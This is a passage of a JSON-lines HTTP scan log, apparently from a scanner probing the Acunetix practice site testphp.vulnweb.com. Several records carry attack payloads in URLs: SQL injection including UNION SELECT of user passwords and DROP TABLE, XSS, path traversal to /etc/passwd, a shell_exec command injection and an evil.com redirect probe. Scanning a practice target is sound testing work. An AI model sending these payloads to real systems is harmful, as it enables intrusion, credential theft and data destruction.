Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?cmd=shell_exec(%27cat%20%2Fetc%2Fissue%27)\",\"time\":\"349.477181ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:35.224192564Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?id=1%2F%2A!50000OR%2A%2F1=2\",\"input\":\"http://testphp.vulnweb.com/?id=1%2F%2A!50000OR%2A%2F1=2\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?id=1%2F%2A!50000OR%2A%2F1=2\",\"time\":\"344.948377ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:35.29940767Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?input=%22%20OR%20%221%22=%221%22%3B%20--\",\"input\":\"http://testphp.vulnweb.com/?input=%22%20OR%20%221%22=%221%22%3B%20--\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?input=%22%20OR%20%221%22=%221%22%3B%20--\",\"time\":\"351.978458ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:35.442965501Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?input=%22%20UNION%20SELECT%20NULL,%20username,%20password%20FROM%20users%3B%20--\",\"input\":\"http://testphp.vulnweb.com/?input=%22%20UNION%20SELECT%20NULL,%20username,%20password%20FROM%20users%3B%20--\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?input=%22%20UNION%20SELECT%20NULL,%20username,%20password%20FROM%20users%3B%20--\",\"time\":\"343.571759ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:38.84295056Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?input=%27%20OR%20%271%27=%271%27%3B%20--\",\"input\":\"http://testphp.vulnweb.com/?input=%27%20OR%20%271%27=%271%27%3B%20--\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?input=%27%20OR%20%271%27=%271%27%3B%20--\",\"time\":\"357.41039ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:38.914304126Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?input=%27%3B%20DROP%20TABLE%20users%3B%20--\",\"input\":\"http://testphp.vulnweb.com/?input=%27%3B%20DROP%20TABLE%20users%3B%20--\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?input=%27%3B%20DROP%20TABLE%20users%3B%20--\",\"time\":\"349.835026ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.049667982Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?input=%3Cimg%20src=x%20onerror=alert(1)%3E\",\"input\":\"http://testphp.vulnweb.com/?input=%3Cimg%20src=x%20onerror=alert(1)%3E\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?input=%3Cimg%20src=x%20onerror=alert(1)%3E\",\"time\":\"349.415677ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.660353907Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?input=%3Cscript%3Ealert(%27XSS%27)%3B%3C%2Fscript%3E\",\"input\":\"http://testphp.vulnweb.com/?input=%3Cscript%3Ealert(%27XSS%27)%3B%3C%2Fscript%3E\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?input=%3Cscript%3Ealert(%27XSS%27)%3B%3C%2Fscript%3E\",\"time\":\"351.688213ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.670617965Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?input=..%5C..%5C..%5Cwindows%5Csystem32%5Ccmd.exe\",\"input\":\"http://testphp.vulnweb.com/?input=..%5C..%5C..%5Cwindows%5Csystem32%5Ccmd.exe\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?input=..%5C..%5C..%5Cwindows%5Csystem32%5Ccmd.exe\",\"time\":\"345.173814ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.680472226Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?input=..%2Fetc%2Fpasswd\",\"input\":\"http://testphp.vulnweb.com/?input=..%2Fetc%2Fpasswd\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?input=..%2Fetc%2Fpasswd\",\"time\":\"358.270759ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.681877592Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?input=http:%2F%2Fevil.com%2F\",\"input\":\"http://testphp.vulnweb.com/?input=http:%2F%2Fevil.com%2F\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?input=http:%2F%2Fevil.com%2F\",\"time\":\"353.276122ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.692313326Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?source=post_page-----2c177545f21d--------------------------------\",\"input\":\"http://testphp.vulnweb.com/?source=post_page-----2c177545f21d--------------------------------\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?source=post_page-----2c177545f21d--------------------------------\",\"time\":\"345.955735ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.703812961Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?trk=public_post-text\",\"input\":\"http://testphp.vulnweb.com/?trk=public_post-text\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?trk=public_post-text\",\"time\":\"343.901542ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.711946389Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?trk=public_post_main-feed-card-text\",\"input\":\"http://testphp.vulnweb.com/?trk=public_post_main-feed-card-text\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?trk=public_post_main-feed-card-text\",\"time\":\"350.989618ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.724506881Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/A01\",\"input\":\"http://testphp.vulnweb.com/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/A01\",\"time\":\"356.750047ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.729421313Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/\",\"input\":\"http://testphp.vulnweb.com/AJAX/\",\"title\":\"ajax test\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/\",\"time\":\"348.471812ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":258,\"lines\":156,\"status_code\":200,\"content_length\":4236,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:39.746847223Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/A01\",\"input\":\"http://testphp.vulnweb.com/AJAX/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/A01\",\"time\":\"344.220934ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:43.604474759Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/CONFIRMED\",\"input\":\"http://testphp.vulnweb.com/AJAX/CONFIRMED\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/CONFIRMED\",\"time\":\"352.714084ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:43.627108308Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/artists.ph\",\"input\":\"http://testphp.vulnweb.com/AJAX/artists.ph\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/artists.ph\",\"time\":\"352.72367ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:43.634354299Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/artists.phpA01\",\"input\":\"http://testphp.vulnweb.com/AJAX/artists.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/artists.phpA01\",\"time\":\"356.490311ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:44.619146899Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/categories\",\"input\":\"http://testphp.vulnweb.com/AJAX/categories\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/categories\",\"time\":\"352.387577ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:44.624062249Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/categories.php\",\"input\":\"http://testphp.vulnweb.com/AJAX/categories.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/categories.php\",\"time\":\"352.920573ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":9,\"lines\":1,\"status_code\":200,\"content_length\":195,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:44.787905284Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/categories.phpA01\",\"input\":\"http://testphp.vulnweb.com/AJAX/categories.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/categories.phpA01\",\"time\":\"339.205391ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:44.862840131Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/httpreq.open\",\"input\":\"http://testphp.vulnweb.com/AJAX/httpreq.open\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/httpreq.open\",\"time\":\"348.890643ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:44.994652693Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com/AJAX/index.php\",\"title\":\"ajax test\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/index.php\",\"time\":\"343.847326ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":258,\"lines\":156,\"status_code\":200,\"content_length\":4236,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:45.044297323Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/index.php2\",\"input\":\"http://testphp.vulnweb.com/AJAX/index.php2\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/index.php2\",\"time\":\"347.329054ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:45.085461643Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/index.phpA01\",\"input\":\"http://testphp.vulnweb.com/AJAX/index.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/index.phpA01\",\"time\":\"351.14088ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:45.179679082Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/index.phpCookie:\",\"input\":\"http://testphp.vulnweb.com/AJAX/index.phpCookie:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/index.phpCookie:\",\"time\":\"352.636618ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:45.208675781Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/index.phpUser-Agent:\",\"input\":\"http://testphp.vulnweb.com/AJAX/index.phpUser-Agent:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/index.phpUser-Agent:\",\"time\":\"346.57174ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:45.24789195Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php4\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php4\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php4\",\"time\":\"344.89084ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:45.515638214Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php4H\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php4H\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php4H\",\"time\":\"347.690765ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:45.585003709Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%287432%3D7432%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%287432%3D7432%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%287432%3D7432%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"time\":\"357.979988ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:45.644232307Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%209436%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%289436%3D9436%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%209436%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%289436%3D9436%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=%28SELECT%209436%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%289436%3D9436%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29\",\"time\":\"340.445008ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":26,\"lines\":6,\"status_code\":200,\"content_length\":244,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:45.793361533Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%20CONCAT%280x7178706a71%2C%28ELT%289505%3D9505%2C1%29%29%2C0x71706b6a71%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%20CONCAT%280x7178706a71%2C%28ELT%289505%3D9505%2C1%29%29%2C0x71706b6a71%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=%28SELECT%20CONCAT%280x7178706a71%2C%28ELT%289505%3D9505%2C1%29%29%2C0x71706b6a71%29%29\",\"time\":\"346.850491ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:49.192876113Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%20CONCAT%28CONCAT%280x7176716271%2C%28CASE%20WHEN%20%281674%3D1674%29%20THEN%200x31%20ELSE%200x30%20END%29%29%2C0x716b786b71%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28SELECT%20CONCAT%28CONCAT%280x7176716271%2C%28CASE%20WHEN%20%281674%3D1674%29%20THEN%200x31%20ELSE%200x30%20END%29%29%2C0x716b786b71%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=%28SELECT%20CONCAT%28CONCAT%280x7176716271%2C%28CASE%20WHEN%20%281674%3D1674%29%20THEN%200x31%20ELSE%200x30%20END%29%29%2C0x716b786b71%29%29\",\"time\":\"346.967151ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:49.264429471Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28UPDATEXML%287014%2CCONCAT%280x2e%2C0x7176716271%2C%28SELECT%20%28ELT%287014%3D7014%2C1%29%29%29%2C0x716b786b71%29%2C2609%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=%28UPDATEXML%287014%2CCONCAT%280x2e%2C0x7176716271%2C%28SELECT%20%28ELT%287014%3D7014%2C1%29%29%29%2C0x7